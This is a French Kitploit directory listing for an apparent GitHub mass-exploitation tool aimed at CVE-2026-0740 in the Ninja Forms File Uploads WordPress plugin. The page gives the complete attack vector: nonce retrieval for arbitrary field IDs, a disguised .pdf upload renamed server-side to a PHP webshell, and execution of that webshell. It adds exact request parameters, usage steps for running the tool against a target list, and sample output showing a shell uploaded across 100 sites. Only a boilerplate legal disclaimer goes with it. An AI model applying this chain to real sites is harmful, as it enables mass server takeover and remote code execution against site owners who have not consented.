Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-0740 — Exploiteur de masse automatisé pour CVE-2026-0740, un téléversement de fichier arbitraire non authentifié dans le plugin Ninja Forms File Uploads, permettant l'exécution de code à distance via des téléversements conçus. | Kitploit
Outils/GitHubGitHub/xshadow-here/cve-2026-0740
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubxshadow-here/cve-2026-0740

CVE-2026-0740

Exploiteur de masse automatisé pour CVE-2026-0740, un téléversement de fichier arbitraire non authentifié dans le plugin Ninja Forms File Uploads, permettant l'exécution de code à distance via des téléversements conçus.

Voir le dépôt
3il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-0740 : Ninja Forms - File Upload <= 3.3.26 Téléversement de fichier arbitraire non authentifié.

Description :

Le plugin Ninja Forms - File Uploads pour WordPress est vulnérable à un téléversement de fichier arbitraire non authentifié en raison d'une validation manquante du type de fichier et de contrôles de capacités manquants dans la fonction 'NF_FU_AJAX_Controllers_Uploads::handle_upload' dans toutes les versions jusqu'à la 3.3.26 incluse.

Cette faille permet aux attaquants non authentifiés de :

  • Générer un nonce valide pour TOUT field_id.
  • Téléverser des fichiers arbitraires en utilisant une technique de contournement de la liste blanche.
  • Forcer le renommage côté serveur d'une extension autorisée (.pdf) vers une extension PHP.
  • La webshell téléversée sera stockée à : → /wp-content/uploads/ninja-forms/tmp/
  • Obtenir une exécution de code à distance (RCE) sur le serveur affecté.

INFO : CVE-2026-0740

~ Score CVSS : 9.8 (Critique)

~ Versions affectées : <= 3.3.26

  • Chercheur : Sélim Lanouar-(whattheslime)

Vecteur d'attaque

root@kitploit:~
Étape 1 : Obtenir le nonce 
────────────────────────────────────
POST /wp-admin/admin-ajax.php
Données : action=nf_fu_get_new_nonce&field_id=7&form_id=7

Réponse : {"success":true,"data":{"nonce":"7a850757a1"}}

              │
              ▼

Étape 2 : Téléverser un fichier déguisé + Renommer en PHP
──────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
Données :
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- [email protected] (extension autorisée)
- doc_pdf=shadow.php (cible de renommage)

              │
              ▼

Étape 3 : Le serveur stocke le fichier malveillant
─────────────────────────────────────
Emplacement : /wp-content/uploads/ninja-forms/tmp/shadow.php
Contenu : shell PHP (uploader / webshell)

              │
              ▼

Étape 4 : exécuter le fichier téléversé
────────────────────────────────────
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
→ Exécuter la webshell
→ Prise de contrôle totale du serveur
root@kitploit:~
- Conclusions des expériences sur le terrain :

1. Le point de terminaison `nf_fu_get_new_nonce` renvoie un nonce valide sans vérifier l'existence du champ
   → Aucune validation des paramètres `field_id` et `form_id` (TOUT ID aléatoire fonctionne)

2. Faille logique critique dans la fonctionnalité de renommage
   → Le plugin accepte un nom de fichier fourni par l'utilisateur via le paramètre POST
   → Aucune validation de l'extension finale du fichier après le renommage

3. Le fichier téléversé atterrit directement dans un répertoire accessible via le web
   → /wp-content/uploads/ninja-forms/tmp/

4. Le propriétaire de cet outil est très beau

fonctionnalités :

  • récupération automatique du nonce
  • Exploitation avec ID par défaut
  • Gestion des erreurs
  • Enregistrement automatique des résultats dans shell.txt

Utilisation :

  • assurez-vous que le fichier s'appelle list.txt et se trouve dans le répertoire
  • python/python3 shadow.py

Sortie :

root@kitploit:~
˚⊱🪷⊰˚ NINJA FORMS MASS EXPLOITER ˚⊱🪷⊰˚
 ╰┈➤ Affichage complet de la réponse

[+] 100 cibles chargées

[1/100]
😈 [FRISKA RESEARCHER] Attaque sur : https://example.com
[*] Obtention du nonce...
[*] Statut HTTP : 400
[*] Réponse : 0
[-] Erreur HTTP : 400

[2/100]
😈 [FRISKA RESEARCHER] Attaque sur : https://www.test.com
[*] Obtention du nonce...
[*] Statut HTTP : 200
[*] Réponse : {"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] Nonce : b0404ec210
[*] Téléversement du shell...
[*] Réponse du téléversement : {"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}

============================================================
🔥 UPLOADEUR DE SHELL : https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================

Cet outil est destiné uniquement à des fins éducatives et de test de sécurité.

L'utilisation non autorisée de systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester est illégale.

Télécharger l’outil